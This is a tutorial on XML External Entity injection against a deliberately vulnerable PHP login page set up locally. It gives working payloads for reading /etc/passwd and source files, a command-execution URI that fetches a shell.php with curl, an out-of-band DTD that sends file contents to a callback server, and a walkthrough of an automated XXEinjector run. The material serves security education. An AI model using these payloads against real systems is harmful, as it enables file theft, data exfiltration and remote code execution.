XML External Entity Injection (XXE)

XML External Entity Injection attacks allow for:

  • File retrieval
  • Server Side Request Forgery
  • Remote Code Execution (in a limited set of circumstances)

XML Entities

Entities are named placeholders for content in an XML document. They are declared in the DOCTYPE and referenced in the document body as &name;. For instance, in the following XML the entity “username” stores the value “admin”, and the reference &username; inside the user element expands to that value.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE creds [ <!ENTITY username "admin"> ]>
<creds><user>&username;</user></creds>

The entity is considered internal, since its value is defined within the XML document.
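
As a minimal sketch of internal entity expansion, assuming Python's standard xml.etree.ElementTree parser and a hypothetical entity named username, the following shows that a reference such as &username; is replaced by the declared value before the application ever sees the text:

```python
import xml.etree.ElementTree as ET

# Hypothetical document: the internal entity "username" is declared in the
# DOCTYPE and referenced inside the <user> element.
DOCUMENT = """<!DOCTYPE creds [ <!ENTITY username "admin"> ]>
<creds><user>&username;</user></creds>"""


def read_user(xml_text):
    """Parse the document and return the text of the <user> element."""
    root = ET.fromstring(xml_text)
    return root.findtext("user")


if __name__ == "__main__":
    # The parser has already substituted the entity reference at this point.
    print(read_user(DOCUMENT))
```

The application code only ever reads the user element, which is why entity expansion is easy to overlook when reviewing code that handles XML.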

External entities allow a document to reference local or remote content outside of the original document. This is done using the SYSTEM keyword followed by a URI. The same keyword appears in the following DOCTYPE declaration, which points to an external document.

<!DOCTYPE html SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 

The document referenced in the above example is a Document Type Definition (DTD). A DTD specifies the structure, elements and attributes that are valid in an XML document.
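
To see where SYSTEM identifiers surface during parsing, here is a small sketch using Python's standard xml.parsers.expat module. The function name list_system_identifiers is hypothetical, and the sketch only records the identifiers; it deliberately never fetches the referenced content.

```python
import xml.parsers.expat


def list_system_identifiers(xml_text):
    """Return (kind, name, system_id) tuples for each SYSTEM identifier seen."""
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called for the DOCTYPE itself, e.g. <!DOCTYPE html SYSTEM "...">
        if system_id is not None:
            found.append(("doctype", name, system_id))

    def on_entity_decl(name, is_parameter, value, base, system_id,
                       public_id, notation):
        # Called for each <!ENTITY ...>; external entities carry a system_id
        if system_id is not None:
            found.append(("entity", name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # Report success without resolving anything when an entity is referenced.
    parser.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 1
    parser.Parse(xml_text, True)
    return found


if __name__ == "__main__":
    doc = ('<!DOCTYPE html SYSTEM '
           '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html/>')
    print(list_system_identifiers(doc))
```

A check like this could be used to flag incoming documents that declare external entities, although rejecting DOCTYPE declarations outright is usually simpler.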

Below is an example of a DTD declared inline. The elements user and password are defined as containing PCDATA (parsed character data).

<!DOCTYPE creds
[
<!ELEMENT user (#PCDATA)>
<!ELEMENT password (#PCDATA)>
]>

Vulnerable Code

Here’s the PHP code we will be attempting to exploit (login.php). The code accepts XML data via a POST request and parses the values it contains.

<?php 
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $user = $creds->user;
    $pass = $creds->pass;
    echo "You are logged in as: $user";
?> 

The LIBXML_NOENT flag tells libxml to substitute entity references with their values, which includes resolving external entities, and LIBXML_DTDLOAD allows loading external Document Type Definitions.

Next, we just need some client-side code to submit XML requests. This file is saved as index.html.

Username:<BR> <input id="myUsername" value="admin"><br><br>
Password:<BR> <input type="password" id="myPassword" value="admin"><br><br>

<button type="button" onclick="siteLogin()">Login</button>

<p id="loginStatus"></p>

<script>
function siteLogin() {

  var username = document.getElementById("myUsername").value;
  var password = document.getElementById("myPassword").value;

  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("loginStatus").innerHTML = this.responseText;
    }
  };
  xhttp.open("POST", "login.php", true);
  xhttp.setRequestHeader("Content-type", "application/xml");
  let data = `<?xml version="1.0" encoding="ISO-8859-1"?><creds><user>` + username + `</user><pass>` + password + `</pass></creds>`;
  xhttp.send(data);
}
</script>

To run this on Kali Linux, make sure php-xml is installed, and start a local PHP web server:

sudo apt install php-xml
php -S 127.0.0.1:8000

Navigating to http://127.0.0.1:8000/ should display the login form.

We can intercept the login request using Burp Suite to see the XML data being transmitted.

POST /login.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/xml
Content-Length: 93
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

<?xml version="1.0" encoding="ISO-8859-1"?>
<creds>
<user>admin</user>
<pass>test</pass>
</creds>
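
The intercepted request can also be reproduced from a script, which makes it easier to swap in modified XML bodies later. The following is a sketch using Python's standard urllib; the helper name build_login_request is hypothetical, and the URL assumes the local PHP server started earlier. The request is only constructed here, and the line that would send it is left commented out.

```python
import urllib.request


def build_login_request(url, xml_body):
    """Create (but do not send) a POST request carrying a raw XML body."""
    return urllib.request.Request(
        url,
        data=xml_body.encode("iso-8859-1"),
        headers={"Content-type": "application/xml"},
        method="POST",
    )


# Same body as the intercepted request above.
BODY = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    "<creds>\n<user>admin</user>\n<pass>test</pass>\n</creds>"
)

if __name__ == "__main__":
    request = build_login_request("http://127.0.0.1:8000/login.php", BODY)
    # Uncomment to send the request to the local test server:
    # print(urllib.request.urlopen(request).read().decode())
    print(request.get_method(), request.full_url)
```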

Arbitrary File Retrieval

We can use the file:// URI scheme to reference files stored on the server. In the example below, we define a new entity called “xxe”. This entity is then referenced in the XML using &xxe;

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds><user>&xxe;</user><pass>test</pass></creds>

Sending this request to the server returns the contents of /etc/passwd, because the value of the user field is echoed back in the response.
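
When testing several files, it can help to generate the payload rather than edit it by hand. This is a small sketch; build_entity_payload is a hypothetical helper that places whatever URI it is given into the SYSTEM identifier of the xxe entity.

```python
def build_entity_payload(system_uri):
    """Return a login document whose <user> field expands to system_uri."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        '<!DOCTYPE foo [ <!ELEMENT foo ANY >'
        f'<!ENTITY xxe SYSTEM "{system_uri}" >]>\n'
        "<creds><user>&xxe;</user><pass>test</pass></creds>"
    )


if __name__ == "__main__":
    print(build_entity_payload("file:///etc/passwd"))
```

The helper does no escaping, so it assumes the URI contains no double quotes.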


PHP Filters

If the retrieved content breaks the XML format, for example by including less-than or greater-than characters (< >), you won’t get any results.

To get around this, PHP filters can be used to retrieve files as Base64-encoded strings, similar to how they are used in LFI attacks.

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=login.php" >]>
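
The response then contains the file as a Base64 string that needs decoding. A minimal sketch follows, assuming the response keeps the "You are logged in as: " prefix printed by login.php; the function name decode_response is hypothetical.

```python
import base64

# Fixed text that login.php prints before the user field.
PREFIX = "You are logged in as: "


def decode_response(response_text):
    """Strip the login.php prefix and Base64-decode the remainder."""
    if not response_text.startswith(PREFIX):
        raise ValueError("unexpected response format")
    encoded = response_text[len(PREFIX):].strip()
    # errors="replace" keeps the sketch usable for files that are not UTF-8.
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


if __name__ == "__main__":
    sample = PREFIX + base64.b64encode(b"<?php echo 1; ?>").decode()
    print(decode_response(sample))
```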

Command Execution

If the PHP expect extension is installed on the server and its expect:// wrapper is available, you can execute commands using the relevant URI scheme:

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'127.0.0.1:4000/shell.php'" >]>
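
The payload above uses $IFS (the shell's internal field separator) in place of spaces, presumably because literal spaces would break the URI. As a sketch of that substitution, with build_expect_uri being a hypothetical helper name:

```python
def build_expect_uri(command):
    """Turn a shell command into an expect:// URI, swapping spaces for $IFS."""
    return "expect://" + command.replace(" ", "$IFS")


if __name__ == "__main__":
    print(build_expect_uri("curl -O '127.0.0.1:4000/shell.php'"))
```

This simple replacement does not handle quoting, so commands that contain spaces inside quoted arguments would need more care.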

Out of Band Data Retrieval

If the application does not provide any output in its response, it might be possible to retrieve information out of band.

To do this, first create a malicious DTD file (evil.dtd) referencing the file you want to retrieve:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hosts">
<!ENTITY % bordergate "<!ENTITY &#37; getfile SYSTEM 'http://127.0.0.1:5000/?p=%file;'>">
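
The DTD can be generated for different target files and callback addresses. This sketch reproduces the two lines above from a template; build_exfil_dtd and its parameter names are hypothetical, while the entity names file, bordergate and getfile are taken from the example.

```python
# Template mirroring evil.dtd: %file; reads the resource as Base64, and
# %bordergate; declares %getfile;, which sends that value to the callback.
DTD_TEMPLATE = """<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource={resource}">
<!ENTITY % bordergate "<!ENTITY &#37; getfile SYSTEM '{callback}/?p=%file;'>">
"""


def build_exfil_dtd(resource, callback):
    """Fill in the file to read and the base URL that receives the data."""
    return DTD_TEMPLATE.format(resource=resource, callback=callback)


if __name__ == "__main__":
    print(build_exfil_dtd("file:///etc/hosts", "http://127.0.0.1:5000"), end="")
```

The inner percent sign is written as &#37; because a parameter entity cannot be declared directly inside another entity's value in the internal form; the character reference is decoded when bordergate is expanded.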

Then start a local web server to host the file:

python3 -m http.server 5000

Next, send an HTTP request to the application referencing the DTD file:

POST /login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/xml
Content-Length: 149
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Cookie: PHPSESSID=u6eor6rkr18h79g3facjbimngl; showhints=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://127.0.0.1:5000/evil.dtd">%remote;%bordergate;%getfile;]>

The file contents should arrive at your web server as a Base64-encoded GET parameter, which can then be decoded:

python3 -m http.server 5000
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...
127.0.0.1 - - [20/May/2023 09:56:01] "GET /evil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [20/May/2023 09:56:01] "GET /?p=MTI3LjAuMC4xCWxvY2FsaG9zdAoxMjcuMC4xLjEJa2FsaQo6OjEJCWxvY2FsaG9zdCBpcDYtbG9jYWxob3N0IGlwNi1sb29wYmFjawpmZjAyOjoxCQlpcDYtYWxsbm9kZXMKZmYwMjo6MgkJaXA2LWFsbHJvdXRlcnMK HTTP/1.1" 200 -

echo MTI3LjAuMC4xCWxvY2FsaG9zdAoxMjcuMC4xLjEJa2FsaQo6OjEJCWxvY2FsaG9zdCBpcDYtbG9jYWxob3N0IGlwNi1sb29wYmFjawpmZjAyOjoxCQlpcDYtYWxsbm9kZXMKZmYwMjo6MgkJaXA2LWFsbHJvdXRlcnMK | base64 -d
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
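
The decoding step can be scripted so that a request path copied from the server log is turned straight into file contents. This is a sketch using only the Python standard library; decode_exfil_path is a hypothetical name, and the parameter name p matches the DTD above.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfil_path(request_path, parameter="p"):
    """Extract the Base64 value from a logged request path and decode it."""
    query = urlsplit(request_path).query
    values = parse_qs(query).get(parameter)
    if not values:
        raise ValueError(f"no '{parameter}' parameter in {request_path!r}")
    # parse_qs turns "+" into a space, so restore it before decoding.
    encoded = values[0].replace(" ", "+")
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


if __name__ == "__main__":
    logged = "/?p=MTI3LjAuMC4xCWxvY2FsaG9zdAo="
    print(decode_exfil_path(logged), end="")
```

The "+" handling matters because Base64 output can contain plus signs, which query-string parsers treat as encoded spaces.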

Automated Out of Band Data Retrieval

XXEinjector can be used to perform automated out of band data retrieval. First copy the HTTP request to a file, removing the XML data and adding the XXEINJECT marker where the payload should be injected:

POST /login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/xml
Content-Length: 206
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/
Cookie: PHPSESSID=u6eor6rkr18h79g3facjbimngl; showhints=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

Then run the tool, referencing the HTTP request we captured:

ruby XXEinjector.rb --host=127.0.0.1 --httpport=6000 --file=/home/kali/request.txt --path=/etc/hosts --verbose --oob=http --phpfilter
XXEinjector by Jakub Pałaczyński

Enumeration options:
"y" - enumerate currect file (default)
"n" - skip currect file
"a" - enumerate all files in currect directory
"s" - skip all files in currect directory
"q" - quit

[-] Multiple instances of XML found. It may results in false-positives.
[+] Sending request with malicious XML:
http://127.0.0.1:80/login.php
{"User-Agent"=>"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", "Accept"=>"*/*", "Accept-Language"=>"en-US,en;q=0.5", "Accept-Encoding"=>"gzip, deflate", "Content-type"=>"application/xml", "Content-Length"=>"240", "Origin"=>"http://127.0.0.1", "Connection"=>"close", "Referer"=>"http://127.0.0.1/", "Cookie"=>"PHPSESSID=u6eor6rkr18h79g3facjbimngl; showhints=1", "Sec-Fetch-Dest"=>"empty", "Sec-Fetch-Mode"=>"cors", "Sec-Fetch-Site"=>"same-origin"}

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://127.0.0.1:6000/file.dtd">%remote;%int;%trick;]>
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://127.0.0.1:6000/file.dtd">%remote;%int;%trick;]>

[+] Got request for XML:
GET /file.dtd HTTP/1.1

[+] Responding with XML for: /etc/hosts
[+] XML payload sent:
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hosts">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://127.0.0.1:6000/?p=%payl;'>">

[+] Response with file/directory content received:
GET /?p=MTI3LjAuMC4xCWxvY2FsaG9zdAoxMjcuMC4xLjEJa2FsaQo6OjEJCWxvY2FsaG9zdCBpcDYtbG9jYWxob3N0IGlwNi1sb29wYmFjawpmZjAyOjoxCQlpcDYtYWxsbm9kZXMKZmYwMjo6MgkJaXA2LWFsbHJvdXRlcnMK HTTP/1.1

[+] Retrieved data:
[+] Nothing else to do. Exiting.

┌──(kali㉿kali)-[~/XXEinjector]
└─$ echo MTI3LjAuMC4xCWxvY2FsaG9zdAoxMjcuMC4xLjEJa2FsaQo6OjEJCWxvY2FsaG9zdCBpcDYtbG9jYWxob3N0IGlwNi1sb29wYmFjawpmZjAyOjoxCQlpcDYtYWxsbm9kZXMKZmYwMjo6MgkJaXA2LWFsbHJvdXRlcnMK | base64 -d
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters


Error Based File Retrieval

If the PHP code is modified to display error messages, an attacker may be able to view the contents of files by triggering an error condition:

<?php 
    ini_set('display_errors', 1);
    ini_set('display_startup_errors', 1);
    error_reporting(E_ALL);

    libxml_disable_entity_loader (false); 
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $user = $creds->user;
    $pass = $creds->pass;
    echo "You are logged in as: $user";
?> 

In the XML below, we load a DTD that already exists on the server and redefine one of its parameter entities (ISOamso) so that it reads /etc/hosts and then references an entity that cannot be loaded (via file:///nonexistent). The resulting error message includes the contents of the file.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/hosts">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<creds><user>test</user><pass>test</pass></creds>

This particular technique was first documented in this blog post.
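
The nested character references in the payload (&#x25; and &#x26;#x25;) are decoded one level at a time as each entity declaration is processed. The sketch below illustrates the layering, using Python's html.unescape as a stand-in for the XML parser's character reference decoding; that substitution is an assumption made for illustration only, and peel_layers is a hypothetical helper.

```python
import html


def peel_layers(text):
    """Decode character references one pass at a time until nothing changes."""
    layers = [text]
    while True:
        decoded = html.unescape(layers[-1])
        if decoded == layers[-1]:
            return layers
        layers.append(decoded)


if __name__ == "__main__":
    # The doubly encoded percent sign used when declaring the error entity.
    for depth, layer in enumerate(peel_layers("&#x26;#x25;")):
        print(depth, layer)
```

Each extra level of encoding postpones the percent sign by one round of parsing, which is what allows the error entity to be declared only once eval is expanded.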

In Conclusion

Most modern XML parsers disable external entity parsing by default. However, in 2023 these vulnerabilities are still being reported.